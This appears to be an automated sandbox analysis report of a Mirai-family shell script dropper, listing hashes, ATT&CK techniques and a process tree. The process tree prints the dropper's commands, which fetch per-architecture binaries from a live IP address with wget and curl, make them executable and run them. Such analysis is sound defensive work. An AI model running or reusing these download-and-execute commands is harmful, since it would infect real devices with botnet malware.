Analysis
-
max time kernel
140s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
11-11-2024 02:09
Static task
static1
Behavioral task
behavioral1
Sample
1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh
-
Size
3KB
-
MD5
77b673f2a4bf201174409274ff5ab549
-
SHA1
07239713e9551c0e0fafb75149b86b0ce0515a0a
-
SHA256
1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18
-
SHA512
66922611e0e8c796248b3ea6ebe4a02c638a2548eb8348b98ce913d9a1127c8a7f0bb6340484d25418e4d1da35d7bfde0b22a142697734197cafce40591fce3c
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 828 chmod 771 chmod 818 chmod 854 chmod 683 chmod 843 chmod 741 chmod 860 chmod 713 chmod 728 chmod 758 chmod 813 chmod 849 chmod 691 chmod 699 chmod -
Executes dropped EXE 15 IoCs
Processes:
ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticioc pid Process /tmp/Chaotic 684 Chaotic /tmp/Chaotic 692 Chaotic /tmp/Chaotic 700 Chaotic /tmp/Chaotic 714 Chaotic /tmp/Chaotic 729 Chaotic /tmp/Chaotic 742 Chaotic /tmp/Chaotic 760 Chaotic /tmp/Chaotic 772 Chaotic /tmp/Chaotic 814 Chaotic /tmp/Chaotic 819 Chaotic /tmp/Chaotic 829 Chaotic /tmp/Chaotic 844 Chaotic /tmp/Chaotic 850 Chaotic /tmp/Chaotic 855 Chaotic /tmp/Chaotic 861 Chaotic -
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
ChaoticChaoticChaoticdescription ioc Process File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 6 IoCs
Processes:
ChaoticChaoticChaoticdescription ioc Process File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic -
Processes:
resource yara_rule behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
ChaoticChaoticcurlChaoticcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/27/status Chaotic File opened for reading /proc/748/status Chaotic File opened for reading /proc/592/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/13/status Chaotic File opened for reading /proc/267/status Chaotic File opened for reading /proc/653/status Chaotic File opened for reading /proc/10/status Chaotic File opened for reading /proc/14/status Chaotic File opened for reading /proc/4/status Chaotic File opened for reading /proc/102/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/6/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/2/status Chaotic File opened for reading /proc/269/status Chaotic File opened for reading /proc/651/status Chaotic File opened for reading /proc/652/status Chaotic File opened for reading /proc/42/status Chaotic File opened for reading /proc/self/exe Chaotic File opened for reading /proc/7/status Chaotic File opened for reading /proc/8/status Chaotic File opened for reading /proc/603/status Chaotic File opened for reading /proc/self/exe Chaotic File opened for reading /proc/170/status Chaotic File opened for reading /proc/22/status Chaotic File opened for reading /proc/self/exe Chaotic File opened for reading /proc/41/status Chaotic File opened for reading /proc/143/status Chaotic File opened for reading /proc/self/auxv curl File opened for reading /proc/143/status Chaotic File opened for reading /proc/5/status Chaotic File opened for reading /proc/6/status Chaotic File opened for reading /proc/153/status Chaotic File opened for reading /proc/27/status Chaotic File opened for reading /proc/4/status Chaotic File opened for reading /proc/656/status Chaotic File opened for reading /proc/269/status Chaotic File opened for reading /proc/113/status Chaotic File opened for reading /proc/111/status Chaotic File opened for reading /proc/308/status Chaotic File opened for reading /proc/145/status Chaotic File opened for reading /proc/153/status Chaotic File opened for reading /proc/41/status Chaotic File opened for reading /proc/652/status Chaotic File opened for reading /proc/22/status Chaotic File opened for reading /proc/142/status Chaotic File opened for reading /proc/809/status Chaotic File opened for reading /proc/11/status Chaotic File opened for reading /proc/19/status Chaotic File opened for reading /proc/42/status Chaotic File opened for reading /proc/self/auxv curl File opened for reading /proc/29/status Chaotic File opened for reading /proc/298/status Chaotic File opened for reading /proc/603/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/644/status Chaotic File opened for reading /proc/18/status Chaotic File opened for reading /proc/29/status Chaotic File opened for reading /proc/7/status Chaotic File opened for reading /proc/22/status Chaotic File opened for reading /proc/271/status Chaotic File opened for reading /proc/652/status Chaotic File opened for reading /proc/602/status Chaotic -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
catwgetcurlcatwgetcurlpid Process 739 cat 717 wget 721 curl 726 cat 732 wget 735 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetcurlwgetcurlwgetwgetwgetwgetwgetcurlcurlcurlcurlwgetwgetwgetcurlcurl1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.shcurlcurlcurlwgetwgetcurlcpcurlcurlcurldescription ioc Process File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sparc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc curl File opened for modification /tmp/Chaotic 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 curl File opened for modification /tmp/busybox cp File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm curl
Processes
-
/tmp/1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh/tmp/1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh1⤵
- Writes file to tmp directory
PID:654 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:657
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Writes file to tmp directory
PID:662
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:673
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arc2⤵PID:680
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:684
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x862⤵
- Writes file to tmp directory
PID:686
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:689
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x862⤵PID:690
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x862⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:692
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Writes file to tmp directory
PID:694
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:695
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x86_642⤵PID:697
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:700
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:707
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.i6862⤵PID:712
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:714
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
PID:726
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:729
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:732
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips642⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mpsl2⤵PID:757
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:760
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Writes file to tmp directory
PID:763
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:767
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm2⤵PID:770
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:772
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Writes file to tmp directory
PID:810
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm52⤵PID:812
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:814
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm62⤵PID:817
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:819
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Writes file to tmp directory
PID:825
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm72⤵PID:827
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-JtdPye ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:829
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Writes file to tmp directory
PID:837
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:838
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.ppc2⤵PID:839
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:844
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:846
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:848
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Writes file to tmp directory
PID:851
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:852
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.m68k2⤵PID:853
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:855
-
-
/usr/bin/wgetwget http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Writes file to tmp directory
PID:857
-
-
/usr/bin/curlcurl -O http://213.199.41.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:858
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sh42⤵PID:859
-
-
/bin/chmodchmod +x 1f807348db851d7ab9103ef670906f36006bdd4af7f09080794b65b85dae0c18.sh busybox Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:861
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD50d6e1b9b64e7264be82e54ce16625d3d
SHA1e7bdee0a6c0edf518ce58dec54ee07c19b0f4f3b
SHA2561bfbf7137af8f36627159116bc0dbfe916315853c6eb61b7d6011224699487f3
SHA512ab43d184b61391ab72085da965fe0498cc99e69f4f87eab448f3c72c3f7e755e9a062af17db0cc5c2117d421a5bf53505b1676ebf554021e356ca8e2cfd41c4b
-
Filesize
36KB
MD56f30551085376afd0fe00be9cd7964a4
SHA10543929d23cd2cf8a8e77e1f335134913e60770f
SHA256e27460f82d4b29d46e902573c344ea43fb28f87441508232d8fdb1a0eb47a74f
SHA51291739913bb1bef30f17b6a354c58f0eb7e8520615cb7afae05ff4cad05707ac47dc30b24bf0ec14b7a3a0fc4c6816247c667274dbe6873db6f2e2c9f38c598ec
-
Filesize
37KB
MD510c4222fcdb2b8876fce8546f820c911
SHA11f9d33ce377022a5f3d712318910ef8294e3a616
SHA256621863fb4ca73db0e6095012da0be5ed7ae3e83069d9b27bad64e269aa60e64a
SHA5124099e845ae4e98b84cfccc0272d93ee0efc51cfa59692d9e6d1605b1e12d94882ff9b26cf7ba9ae01a652784cf7355841a57a2f18d6233f44b56aedc65e7a866
-
Filesize
43KB
MD5359609d0ce5ba09366b9f92140569854
SHA1e3564fcd36fd0442f5e11ce70721a6dd9c307d7e
SHA2564321f25e0cbd9afe47c8dc5732ae39975af499cd8a1df4d405508daeff5fcff7
SHA512ebec8f5ae1b8ca60f8d7a3961e83c2d691e83df37fbf271109413e7c9d5d820ec1a05e20b76606ade97989c2935370dc7890c50b70ae275fdf762d6bad11d11e
-
Filesize
95KB
MD5afbfe0607661819fbade431e4b7cc127
SHA19cd976f7a280c498cbffe3c11062ea5ebbf5c893
SHA256e1b2dc1e3a2821dcdbe1ce3f1c73745e14db000204f90485eca0483158d284dc
SHA5123afb5d94d6c11d55c737a368caed0fc3185c1054f7d85c51c2059fb40e766c8e7e531cb79b37ab00d50ad4801840f9462b8a3088491f43e43024569b18603596
-
Filesize
507KB
MD5e588bcf03ae78237b58899d35f50c570
SHA12194732ebbefbc27bdae876c77f2a97a20175710
SHA2562dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555
-
Filesize
113KB
MD5c62f59a26c1abbde3c399b007d42f689
SHA132f5fe369907ad84049758e7ec698b780ab5e1b7
SHA25605e5bbf635a0d5600f4a5814c743b599891556c9812d3ea898546047fe941009
SHA512d9adf2245cd257113dbf4174af3cdad0a36ba1ceed88ddbe0b83fbb92decbf5154b759dfb56a6ac5d62ebc2a1a511a5ecc8b99da6e550c04458ff78b149fe6ac